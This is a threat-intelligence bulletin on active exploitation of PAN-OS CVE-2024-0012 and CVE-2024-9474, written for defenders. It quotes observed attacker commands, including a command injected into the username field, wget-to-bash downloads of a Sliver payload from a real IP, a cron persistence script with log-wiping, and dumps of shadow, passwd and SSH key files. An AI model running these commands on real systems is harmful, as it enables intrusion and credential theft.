Arctic Wolf Observes Threat Campaign Targeting Palo Alto Networks Firewall Devices
Arctic Wolf Observes Ongoing Exploitation of Critical Palo Alto Networks Vulnerability CVE-2024-0012 Chained with CVE-2024-9474
On November 19, 2024, Arctic Wolf began observing active exploitation of the recently-disclosed CVE-2024-0012 and CVE-2024-9474 vulnerabilities impacting Palo Alto Networks PAN-OS software. When chained together, these vulnerabilities allow an unauthenticated threat actor with network access to the management web interface to gain administrator privileges. Exploitation could enable threat actors to perform administrative actions, modify configurations, or leverage other authenticated privilege escalation vulnerabilities. Since our last bulletin regarding these vulnerabilities, the following has occurred:
- We have detected exploitation of CVE-2024-9474 chained with CVE-2024-0012 in customer environments. While CVE-2024-9474 is classified as a medium-severity vulnerability on its own, exploiting CVE-2024-0012 allows a threat actor to bypass authentication and gain PAN-OS administrator access to the management web interface, allowing them to escalate privileges and perform actions on the firewall with root privileges.
- Upon successful exploitation, we have observed threat actors attempting to transfer tools into the environment and exfiltrate config files from the compromised devices.
- On November 19, 2024, new technical details of CVE-2024-0012 and CVE-2024-9474 were publicly disclosed by WatchTowr, which included Proof-of-Concept (PoC) exploit code.
- PAN has further specified that CVE-2024-0012 only affects PA-Series, VM-Series, and CN-Series firewalls running PAN-OS versions 10.2, 11.0, 11.1, and 11.2, as well as Panorama (virtual and M-Series) and WildFire appliances.
- In addition to identical impacted products, CVE-2024-9474 impacts PAN-OS 10.1.
Arctic Wolf assesses with high confidence that threat actors will continue targeting this vulnerability due to a PoC exploit being made available publicly, which lowers the barrier to exploitation. Additionally, publicly exposed firewalls are an attractive target due to the risk of exfiltrating sensitive data and conducting further lateral movement in compromised environments. Earlier this year when threat actors exploited GlobalProtect, Palo Alto Networks devices were shown to be an attractive target to threat actors.
What We Know About the Intrusions
Exploitation Details
Historically, threat actors have shown an interest in rapidly weaponizing newly disclosed vulnerabilities, especially for perimeter devices such as firewalls and VPN gateways. When the CVE-2024-3400 RCE vulnerability in PAN-OS was disclosed in April 2024 with a subsequent watchTowr technical writeup, threat actors were quick to begin mass exploitation using the available technical details.
With the disclosure of CVE-2024-0012/CVE-2024-9474, we observe a similar pattern of threat activity targeting PAN devices immediately following the publication of relevant technical details. As described in the most recent watchTowr article, a username field can be abused for the injection of arbitrary commands. This aligns with firewall log lines that we observed showing a Panorama console login where the username field includes a bash command enclosed in backticks:
1,2024/11/20 REDACTED_TIME,REDACTED_ID,SYSTEM,general,2562,2024/11/20 08:08:18,,general,,0,0,general,informational,"User `curl 46.8.226.75/1.txt -o /var/appweb/htdocs/unauth/1.php` logged in via Panorama from Console using http over an SSL connection",REDACTED_ID,0x8000000000000000,0,0,0,0,,gw11_2,0,0,REDACTED_TIME
Notably, some files observed during this stage of the attack referenced watchTowr and CVE-2024-9474.
- watchTowr.js
- watchTowr.php
- watchTowr.txt
- CVE20249474.php
Command and Control
Arctic Wolf Labs observed several similar indicators of compromise in the most recent intrusions to what was seen with CVE-2024-3400. For example, as seen in the example command below, a common pattern is for threat actors to use curl or wget on compromised devices to download malicious payloads with IPv4 addresses in the URLs instead of domain names.
Several commands were observed in the most recent intrusions that indicated potential ingress tool transfer. One notable example is an instance where Sliver C2 was retrieved, an open-source alternative to the commonly used Cobalt Strike penetration testing tool.
wget --no-check-certificate -qO-https://104.131.69.106/vicidial/vicidial_sign.js|bash
The contents of the script (vicidial_sign.js) shown below has several key functions:
- Curl is used to download a JavaScript file (up.js) from the 104.131.69[.]106 IP address and saves it to the /usr/lib/e_nas directory. If curl fails, it attempts to use wget instead.
- The touch command is used to change the modification and access timestamp of the /usr/lib/e_nas directory to match that of /usr/lib/php.ini, likely to hide the recent modification to the file.
- Any existing content in the /etc/cron.hourly/telemetry.cron file is cleared out, and a script is written to the same path.
- The script then checks if a process named cloud-lib is running (psgrep -x cloud_lib), and if not, it copies, /usr/lib/e_nas to the /usr/bin/cloud-lib directory, setting its permission to executable only by owner (chmod 700), then proceeds to run it in the background.
- The permission of /etc/cron.hourly/telemetry.cron is changed to 755, allowing it to be executed.
- The touch command is used again to modify the timestamps of /etc/cron.hourly/telemetry.cron to match /etc/cron.hourly/logrotate_hourly, again likely to hide the modification to the file.
- Bash history is cleared to avoid evidence of the commands having been executed.
#!/bin/bash curl -k https://104.131.69.106/vicidial/up.js -o /usr/lib/e_nas || wget --no-check-certificate https://104.131.69.106/vicidial/up.js -O /usr/lib/e_nas touch -r /usr/lib/php.ini /usr/lib/e_nas echo '' > /etc/cron.hourly/telemetry.cron echo '#!/bin/sh' > /etc/cron.hourly/telemetry.cron echo "bash -c 'if ! pgrep -x cloud-lib; then cp /usr/lib/e_nas /usr/bin/cloud-lib && chmod 700 /usr/bin/cloud-lib && (/bin/cloud-lib &); fi'" >> /etc/cron.hourly/telemetry.cron chmod 755 /etc/cron.hourly/telemetry.cron touch -r /etc/cron.hourly/logrotate_hourly /etc/cron.hourly/telemetry.cron echo "" > /root/.bash_history
The file (up.js) outlined in the section above is a UPX-packed Sliver payload.
Data Exfiltration
In observed intrusions, threat actors issued multiple data staging and exfiltration commands to retrieve sensitive information from firewall devices. Most exfiltration data included firewall configuration files which are known to include hashed credentials. Additionally, some attempts were made to exfiltrate operating system passwd and shadow files.
Here is a selection of injected commands involving attempts to exfiltrate credentials and PAN configuration files:
cat /root/.ssh/authorized_keys > /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php’ cat /etc/networks > /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php’ arp -a > /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php’ cat /etc/passwd > /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php’ cat /etc/shadow > /var/appweb/htdocs/unauth/watchTowr.txt’
In some instances, threat actors archived the output of these files using the tar command:
tar -zcvf /tmp/f03.png /opt/pancfg/mgmt/saved-configs
PHP Webshell
One of the payloads deployed was an obfuscated PHP webshell. The key functions are as follows:
- When a HTTP request is made, the webshell monitors for the use of an obfuscated POST parameter called $oNvPH071PRH, which is a base64 encoded and XOR encrypted string.
- Upon decryption of that POST parameter, the webshell looks for a provided payload parameter, which it proceeds to execute through the PHP eval function.
- The output is base64 encoded and XOR encrypted, and is padded with a header of the first 8 bytes consisting of the md5sum of 18f566d952acaa29, and with a footer of the last 8 bytes consisting of the md5sum of 18f566d952acaa29.